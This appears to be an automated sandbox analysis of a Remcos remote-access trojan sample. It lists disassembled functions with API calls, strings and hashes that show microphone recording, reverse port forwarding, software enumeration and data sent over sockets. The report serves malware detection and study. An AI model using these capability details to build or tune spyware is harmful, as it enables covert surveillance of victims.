                                        • _free.LIBCMT ref: 00446E06
                                        • _free.LIBCMT ref: 00446E11
                                        • _free.LIBCMT ref: 00446E1C
                                        • _free.LIBCMT ref: 00446E27
                                        • _free.LIBCMT ref: 00446E32
                                        • _free.LIBCMT ref: 00446E3D
                                        • _free.LIBCMT ref: 00446E48
                                        • _free.LIBCMT ref: 00446E56
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                        • Instruction ID: 4059f081e6094245f9dcb18e84e070fbb06f55adf0c09f86c969ccb3ae0415ae
                                        • Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                        • Instruction Fuzzy Hash: 0E11CB7550051CBFDB05EF55C842CDD3B76EF06364B42C0AAF9086F222DA75DE509B85
                                        Function 0041B834 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 214registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041B856
                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041B89A
                                        • RegCloseKey.ADVAPI32(?), ref: 0041BB64
                                        Strings
                                        • DisplayName, xrefs: 0041B8E1
                                        • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0041B84C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnumOpen
                                        • String ID: DisplayName$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                        • API String ID: 1332880857-3614651759
                                        • Opcode ID: 076c50df7618aadf373f3c01ed9bd4609fd971215d56056228721ff8a86bdb77
                                        • Instruction ID: efd277ba010ae8e34e1206f32af9d70b7e49420e91acd4d446967662cfc0484b
                                        • Opcode Fuzzy Hash: 076c50df7618aadf373f3c01ed9bd4609fd971215d56056228721ff8a86bdb77
                                        • Instruction Fuzzy Hash: 67813E311082449BD324EB21DC51AEFB7E9FFD4314F10493FB586921E1EF34AA49CA9A
                                        Function 00410314 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 192COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Eventinet_ntoa
                                        • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
                                        • API String ID: 3578746661-4192532303
                                        • Opcode ID: 8131232ea4e110a78cbbe142682e0b221beec53302878eaae0296b789d50c990
                                        • Instruction ID: 5385bfc655a789aeb426c9546597e5e9554731b695d1c34d5ebe0a8eef4996cc
                                        • Opcode Fuzzy Hash: 8131232ea4e110a78cbbe142682e0b221beec53302878eaae0296b789d50c990
                                        • Instruction Fuzzy Hash: AA517371A042009BC714F779D85AAAE36A59B80318F40453FF849972E2DF7CADC5CB9E
                                        Function 004165FC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 103sleepfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C
                                          • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                                        • Sleep.KERNEL32(00000064), ref: 00416688
                                        • DeleteFileW.KERNEL32(00000000), ref: 004166BC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CreateDeleteExecuteShellSleep
                                        • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                        • API String ID: 1462127192-2001430897
                                        • Opcode ID: b9a5cb25ade68b6fe2589745dbe0be08f51fb2d4aea0f2061956a18dd9341e5a
                                        • Instruction ID: c19d1c6df4eaf99de932d1d3e2b79d277c3c3ae54bcdefde962c91a872100eda
                                        • Opcode Fuzzy Hash: b9a5cb25ade68b6fe2589745dbe0be08f51fb2d4aea0f2061956a18dd9341e5a
                                        • Instruction Fuzzy Hash: 5B313E719001085ADB14FBA1DC96EEE7764AF50708F00017FF906730E2EF786A8ACA9D
                                        Function 00401A8E Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON
                                        Download Yara Rule
                                        APIs
                                        • _strftime.LIBCMT ref: 00401AD3
                                          • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                        • waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
                                        • waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
                                        • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                        • String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
                                        • API String ID: 3809562944-3643129801
                                        • Opcode ID: f816f63c6ac9835ee23b06cccc8d3180f7f4d1f3f2885b8dfbf4a592b63f2106
                                        • Instruction ID: 71dc54c49c3278552d12686eedaa48b86947864de512bb92fe626abde6f710f1
                                        • Opcode Fuzzy Hash: f816f63c6ac9835ee23b06cccc8d3180f7f4d1f3f2885b8dfbf4a592b63f2106
                                        • Instruction Fuzzy Hash: 98317E315053009BC314EF25DC56A9E77E8BB94314F40883EF559A21F1EF78AA49CB9A
                                        Function 0040196B Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 72COMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
                                        • waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
                                        • waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
                                        • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
                                        • waveInStart.WINMM ref: 00401A81
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                        • String ID: XCG$`=G$x=G
                                        • API String ID: 1356121797-903574159
                                        • Opcode ID: 2fa2782d5286cb6b946f29ce45bec9f2347d723f1f3b5a78e95a6039d4b8a833
                                        • Instruction ID: eaefd7a1fab34284b98bc4f49641b1dd71ce781583fbb4b877c049bb372049a4
                                        • Opcode Fuzzy Hash: 2fa2782d5286cb6b946f29ce45bec9f2347d723f1f3b5a78e95a6039d4b8a833
                                        • Instruction Fuzzy Hash: 1A215C316012409BC704DF7EFD1696A7BA9FB85742B00843AF50DE76B0EBB89880CB4C
                                        Function 0041C97F Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 47windowstringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C998
                                          • Part of subcall function 0041CA2F: RegisterClassExA.USER32(00000030), ref: 0041CA7C
                                          • Part of subcall function 0041CA2F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA97
                                          • Part of subcall function 0041CA2F: GetLastError.KERNEL32 ref: 0041CAA1
                                        • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9CF
                                        • lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9E9
                                        • Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9FF
                                        • TranslateMessage.USER32(?), ref: 0041CA0B
                                        • DispatchMessageA.USER32(?), ref: 0041CA15
                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA22
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                        • String ID: Remcos
                                        • API String ID: 1970332568-165870891
                                        • Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                        • Instruction ID: a3c1d7bf95fc3ae1ab8e5dc1b7104b29b221ef3087a45b83961503d05de66f2d
                                        • Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                        • Instruction Fuzzy Hash: 620121B1944348ABD7109FA5FC4CEDA7BBCAB45B16F004035F605E2162D7B8A285DB2D
                                        Function 0044B460 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b03e61c4093a21660133e67fc3f0c2c165a648bd703d9864a2b1dbb5c11dd296
                                        • Instruction ID: eb32e44420a9d0dd2d5c4453ebfd120c933f738a1b2f21936dd04ad6d98d905f
                                        • Opcode Fuzzy Hash: b03e61c4093a21660133e67fc3f0c2c165a648bd703d9864a2b1dbb5c11dd296
                                        • Instruction Fuzzy Hash: 6FC1E670D042499FEF11DFADD8417AEBBB4EF4A304F08405AE814A7392C778D941CBA9
                                        Function 00452B3A Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,00452E13,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00452BE6
                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,00452E13,00000000,00000000,?,00000001,?,?,?,?), ref: 00452C69
                                        • __alloca_probe_16.LIBCMT ref: 00452CA1
                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,00452E13,?,00452E13,00000000,00000000,?,00000001,?,?,?,?), ref: 00452CFC
                                        • __alloca_probe_16.LIBCMT ref: 00452D4B
                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00452E13,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D13
                                          • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41
                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00452E13,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D8F
                                        • __freea.LIBCMT ref: 00452DBA
                                        • __freea.LIBCMT ref: 00452DC6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                        • String ID:
                                        • API String ID: 201697637-0
                                        • Opcode ID: 33853d2748869a5bbf0e5c11ad0ba2693683b8c54e761c696d343b85774101d6
                                        • Instruction ID: 924e7ddfc51c8ace49a4e982202af340d06b3b5a9b96f94d8290dca04e209d32
                                        • Opcode Fuzzy Hash: 33853d2748869a5bbf0e5c11ad0ba2693683b8c54e761c696d343b85774101d6
                                        • Instruction Fuzzy Hash: E691C572E002169BDF218E64CA41AEF7BB5AF0A311F14456BEC01E7243D7ADDC49C7A8
                                        Function 00444409 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,00000000,?,0043B965,00000000,00000000), ref: 00446ED3
                                          • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                          • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F47
                                          • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                        • _memcmp.LIBVCRUNTIME ref: 004446B3
                                        • _free.LIBCMT ref: 00444724
                                        • _free.LIBCMT ref: 0044473D
                                        • _free.LIBCMT ref: 0044476F
                                        • _free.LIBCMT ref: 00444778
                                        • _free.LIBCMT ref: 00444784
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$ErrorLast$_abort_memcmp
                                        • String ID: C
                                        • API String ID: 1679612858-1037565863
                                        • Opcode ID: 78a772055084dd11d4ef40813aeefa18dab1270aefb2628fdec0a9e84f74d69a
                                        • Instruction ID: 096df170494440478aae843429242aea5750b14c08813bebb9acd843c79e49b1
                                        • Opcode Fuzzy Hash: 78a772055084dd11d4ef40813aeefa18dab1270aefb2628fdec0a9e84f74d69a
                                        • Instruction Fuzzy Hash: E8B14A75A012199FEB24DF18C884BAEB7B4FF49314F1085AEE909A7351D739AE90CF44
                                        Function 004139C7 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 228COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: tcp$udp
                                        • API String ID: 0-3725065008
                                        • Opcode ID: 3317bb7e427a09276a98136aacea04ff7717d48f4dd4b8ff28f9b5a2aba46388
                                        • Instruction ID: e5bb8fef491b59a621f975c33c92e719a9e773eef76f1c958f584ffae729cd60
                                        • Opcode Fuzzy Hash: 3317bb7e427a09276a98136aacea04ff7717d48f4dd4b8ff28f9b5a2aba46388
                                        • Instruction Fuzzy Hash: 9171AB716083028FDB24CE5584847ABB6E4AF84746F10043FF885A7352E778DE85CB9A
                                        Function 00412C88 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 135registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1
                                          • Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                          • Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                          • Part of subcall function 00404468: send.WS2_32(000002FC,00000000,00000000,00000000), ref: 004044FD
                                        • RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnumInfoOpenQuerysend
                                        • String ID: TUF$TUFTUF$>G$DG$DG
                                        • API String ID: 3114080316-72097156
                                        • Opcode ID: 08034cecb19fcd7980957ebfa6e18f25f8bbd9987c681b47e78dc83fc42bb37e
                                        • Instruction ID: 977689a643a5ec5a4c60f988ad8168500f8ba0dfdc14b2429fd77a11b5167535
                                        • Opcode Fuzzy Hash: 08034cecb19fcd7980957ebfa6e18f25f8bbd9987c681b47e78dc83fc42bb37e
                                        • Instruction Fuzzy Hash: 9041A2316042009BC224F635D8A2AEF7394AFD0708F50843FF94A671E2EF7C5D4986AE
                                        Function 00406BE9 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                        • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                          • Part of subcall function 00404468: send.WS2_32(000002FC,00000000,00000000,00000000), ref: 004044FD
                                        • CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                        • MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                        • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
                                        • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
                                          • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
                                          • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                        • String ID: .part
                                        • API String ID: 1303771098-3499674018
                                        • Opcode ID: 124c633532e8600691c4108089ff1e2e84c33ce980c006a8ee94900b53e6ed61
                                        • Instruction ID: 92ff4720e6a7c249f3c3ae71a82c25b1888123647972eaae8327678ea1ca1cb3
                                        • Opcode Fuzzy Hash: 124c633532e8600691c4108089ff1e2e84c33ce980c006a8ee94900b53e6ed61
                                        • Instruction Fuzzy Hash: 2131C4715083009FD210EF21DD459AFB7A8FB84315F40093FF9C6A21A1DB38AA48CB9A
                                        Function 0041A82D Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 90COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
                                          • Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
                                          • Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE
                                          • Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C
                                          • Part of subcall function 0041B16B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B183
                                        • _wcslen.LIBCMT ref: 0041A906
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                        • String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
